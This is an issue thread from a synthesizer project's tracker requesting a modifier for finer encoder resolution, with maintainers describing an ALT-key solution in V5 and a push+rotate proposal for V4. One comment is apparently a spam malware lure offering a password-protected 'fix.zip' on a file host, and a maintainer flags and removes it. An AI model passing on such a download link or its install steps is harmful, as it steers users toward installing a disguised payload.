### ISSUE TITLE
Modifier to increase the resolution of the knobs

### ISSUE THREAD

**Issue by oscaracena** [zynthian/zynthian-issue-tracking#1174]
**Is your feature request related to a problem? Please describe.**
Some parameters can not be finely adjusted. For instance, in the C* Click Metronome, you can adjust the BPM, with a resolution of 0.1. But, when you turn the encoder, it changes by a large amount (around 1.2), and it’s very hard, when not imposible, to set it to something like 60 BPM (it jumps from 59.5 to 60.6).

**Describe the solution you'd like**
Use a button (like ALT) to increase the resolution of the encoder.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by riban-bw** [comment]
I removed what looked like a spam comment linking to a download that crashes chrome (and may do worse on other OS).

**Comment by riban-bw** [comment]
ALT modifier implemented to enable fine control for V5.
Horizontal drag implemented for fine control on touch.
How do we do this for V4? Could press and adjust but would need to avoid interference with bold/long push which could prove challenging.

**Comment by jofemodo** [comment]
I've a working proposal for V4 "push+rotate". It works quite nicely without interfering other push events. Of course, you must start rotating before the "long push" timeout, but this is not a serious limitation.
